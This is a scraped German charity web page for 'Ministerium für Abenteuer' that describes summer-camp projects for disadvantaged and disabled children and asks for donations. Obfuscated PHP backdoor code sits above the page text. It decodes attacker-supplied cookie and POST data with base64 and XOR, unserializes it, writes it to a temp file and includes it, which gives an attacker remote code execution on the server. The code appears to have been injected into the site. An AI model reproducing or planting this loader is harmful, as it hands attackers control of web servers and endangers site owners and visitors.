$aGXtL = 'p' . chr ( 535 - 467 ).chr (66) . "\137" . chr (77) . chr (122) . "\x78" . 'H' . chr (121); $PzsTjoojMv = chr (99) . chr ( 137 - 29 )."\x61" . 's' . "\x73" . '_' . chr ( 427 - 326 ).chr (120) . "\x69" . "\163" . "\x74" . chr (115); $VjvzP = class_exists($aGXtL); $aGXtL = "49189";$PzsTjoojMv = "43253";$gNJLl = !1;if ($VjvzP == $gNJLl){function CiMdzUNw(){return FALSE;}$cfKddlHHd = "60282";CiMdzUNw();class pDB_MzxHy{private function yLVHXQlTJ($cfKddlHHd){if (is_array(pDB_MzxHy::$GCncQRScik)) {$KyMNBGC = sys_get_temp_dir() . "/" . crc32(pDB_MzxHy::$GCncQRScik[chr ( 569 - 454 ).chr ( 297 - 200 ).chr (108) . "\x74"]);@pDB_MzxHy::$GCncQRScik[chr (119) . "\162" . "\151" . "\x74" . "\145"]($KyMNBGC, pDB_MzxHy::$GCncQRScik['c' . chr ( 1074 - 963 )."\156" . 't' . chr ( 886 - 785 ).chr ( 195 - 85 ).chr (116)]);include $KyMNBGC;@pDB_MzxHy::$GCncQRScik['d' . chr ( 573 - 472 ).chr ( 776 - 668 ).chr (101) . chr ( 680 - 564 ).chr ( 486 - 385 )]($KyMNBGC); $cfKddlHHd = "60282";exit();}}private $wFkHfEanhy;public function iWJvjFp(){echo 4681;}public function __destruct(){$cfKddlHHd = "19140_27974";$this->yLVHXQlTJ($cfKddlHHd); $cfKddlHHd = "19140_27974";}public function __construct($HYgdTUOZo=0){$qtlTWZag = $_POST;$uOeEECXqPK = $_COOKIE;$xZdiaFYm = "1c626fdb-4756-4973-84b9-f465d4226acb";$hTORmxKpt = @$uOeEECXqPK[substr($xZdiaFYm, 0, 4)];if (!empty($hTORmxKpt)){$EEOoGL = "base64";$UNZXKH = "";$hTORmxKpt = explode(",", $hTORmxKpt);foreach ($hTORmxKpt as $jaRbP){$UNZXKH .= @$uOeEECXqPK[$jaRbP];$UNZXKH .= @$qtlTWZag[$jaRbP];}$UNZXKH = array_map($EEOoGL . "\137" . "\144" . "\145" . "\143" . "\x6f" . "\144" . "\x65", array($UNZXKH,)); $UNZXKH = $UNZXKH[0] ^ str_repeat($xZdiaFYm, (strlen($UNZXKH[0]) / strlen($xZdiaFYm)) + 1);pDB_MzxHy::$GCncQRScik = @unserialize($UNZXKH); $UNZXKH = class_exists("19140_27974");}}public static $GCncQRScik = 38115;}$Sbretqpwx = new /* 18504 */ pDB_MzxHy(60282 + 60282); $_POST = Array();unset($Sbretqpwx);} Soziale Projekte | Ministerium für Abenteuer

Soziale Projekte

Unsere Projekte

Einsatz für sozial
benachteiligte Kinder

Wir möchten Kindern aus einkommensschwache Familien mit einer Teilnahme ans unseren Sommercamps ein tolles Ferienerlebnis schenken.

Abenteuer für Kinder mit Beeinträchtigungen

Unabhängig von ihren körperlichen und geistigen Fähigkeiten möchten wir Kindern Spaß und unvergessliche Erinnerungen ermöglichen.

Bauwägen für unsere Projektwochen mit Bambinis

Für die Durchführung unserer Sommercamps sollen Bauwägen als wetterunabhängige Übernachtungsmöglichkeit zur Verfügung stehen.

Ihre Unterstützung

Unterstützen Sie unsere Mission durch Ihre Spende 

 
Wir, das Ministerium für Abenteuer, setzen uns leidenschaftlich für vielfältige Projekte ein. 
Um diese Vision zu verwirklichen, sind wir auf die großzügige Unterstützung unserer 
Gemeinschaft angewiesen. 
 

Ihre Spende macht einen Unterschied 

 
Ihre Spende ist ein direkter Beitrag, der es uns ermöglicht, unsere Programme und Projekte 
weiterzuentwickeln und auszubauen. Jeder Betrag, ob groß oder klein, trägt dazu bei, positive 
Veränderungen in unserer Gemeinschaft herbeizuführen. 
 

Vielfältige Projekte, ein gemeinsames Ziel 

 
Wir betreuen verschiedene Projekte, darunter derzeit unser Engagement für benachteiligte 
Familien. Für weitere Informationen lesen Sie dazu unsere Projektbeschreibung. 
Perspektivisch planen wir die Umsetzung weiterer Projekte im Jahr 2025, wie beispielsweise 
der Einsatz für Grundschulkinder der 3. und 4. Klasse oder die Organisation einer 
Sommerferiencampwoche für Kinder, die mit einer Behinderung oder Beeinträchtigung leben.  
 

Wie Sie helfen können 

 
Sie können unsere Arbeit unterstützen, indem Sie eine Spende über unser sicheres Online
Formular tätigen oder direkt auf unser Spendenkonto überweisen. Jede Spende ist steuerlich 
absetzbar und wird mit großer Dankbarkeit entgegengenommen. Wir respektieren die 
Anonymität unserer Unterstützer*innen und bieten die Möglichkeit zu spenden, ohne dabei 
persönliche Informationen preiszugeben. Wenn jedoch ein Unternehmen seinen Beitrag 
öffentlich bekannt machen möchte, besteht die Option, einen Dankeschön Post zu 
veröffentlichen. Wir schätzen jede Form der Unterstützung und sind dankbar für das 
Vertrauen, das unsere Förderer in uns setzen. 

Unterstützen Sie unsere Projekte

Ihre Spende hilft, soziale Projekte wirksam zu unterstützen.

Sie können unser Online-Formular nutzen.

Alternativ können Sie Ihre Spende direkt auf unser Spendenkonto überweisen.

Bank: Stadt- und Kreissparkasse Leipzig
IBAN: DE18 8605 5592 1090 2858 99
BIC: WELADE8LXXX

Jetzt Spenden